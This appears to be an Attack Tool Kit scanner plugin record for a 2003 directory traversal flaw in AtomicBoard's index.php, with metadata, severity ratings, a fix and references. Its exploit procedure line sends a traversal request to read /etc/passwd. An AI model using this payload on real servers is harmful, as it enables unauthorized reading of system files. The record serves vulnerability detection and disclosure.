AtomicBoard prior 0.9.42 Directory Traversal 2.0
 
Plugin ID17
Plugin nameAtomicBoard prior 0.9.42 Directory Traversal
Plugin filenameAtomicBoard prior 0.9.42 Directory Traversal.plugin
Plugin filesize3483 bytes
Plugin familyCGI
Plugin created nameMarc Ruef
Plugin created emailmarc dot ruef at computec dot ch
Plugin created webhttp://www.computec.ch
Plugin created companycomputec.ch
Plugin created date2003/11/13
Plugin updated nameMarc Ruef
Plugin updated emailmarc dot ruef at computec dot ch
Plugin updated webhttp://www.computec.ch
Plugin updated companycomputec.ch
Plugin updated date2004/11/13
Plugin version2.0
Plugin changelogChanged the Vulnerability Class into Directory Traversal and also the plugin name in version 1.3. Enhanced the solution in version 1.4. Corrected the plugin structure and added the accuracy values in 1.5. Improved the pattern matching and added the changelog in 2.0
Plugin protocoltcp
Plugin port80
Plugin procedure exploitopen|send /atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd HTTP/1.0\n\n|sleep|close|pattern_exists HTTP/#.# ### *root:*
Plugin exploit accuracy99
Plugin commentThis plugin was written with the ATK Attack Editor.
Bug published namegr00vy
Bug published date2003/07/25
Bug produced nameAtomicBoard Team
Bug produced webhttp://cal007300.student.utwente.nl/atomicboard/
Bug affectedAtomicBoard prior 0.9.42
Bug not affectedAtomicBoard 0.9.42 and newer
Bug vulnerability classDirectory Traversal
Bug descriptionThe AtomicBoard is a set of PHP scripts. These provide the functionality of a web board. There is the possibility to read arbitrary files on the host by supplying a filename to the 'location' argument of the file index.php.
Bug solutionDo not use Atomic Board yet. The developer does not recommend the use of Atomic Board in production systems. The project has been stopped. Or you habe to upgrade to AtomicBoard 0.9.42. Then also limit unwanted connections and communications with firewalling if possible.
Bug fixing time30 minutes
Bug exploit availabilityYes
Bug exploit urlhttp://www.securityfocus.com/bid/8236/exploit/
Bug remoteYes
Bug localYes
Bug severityHigh
Bug popularity7
Bug simplicity7
Bug impact8
Bug risk7
Bug Nessus riskSerious
Bug check toolsNessus is able to do the same check.
Source SecurityFocus BID8236
Source Secunia ID9355
Source Nessus ID11795
Source LiteratureHacking Exposed: Network Security Secrets & Solutions, Stuart McClure, Joel Scambray and George Kurtz, February 25, 2003, 4th Edition, McGraw-Hill Osborne Media, ISBN 0072227427
Source Misc.http://secunia.com/product/1906/

This file was generated by the Attack Tool Kit (ATK), the open-sourced security scanner and exploiting framework.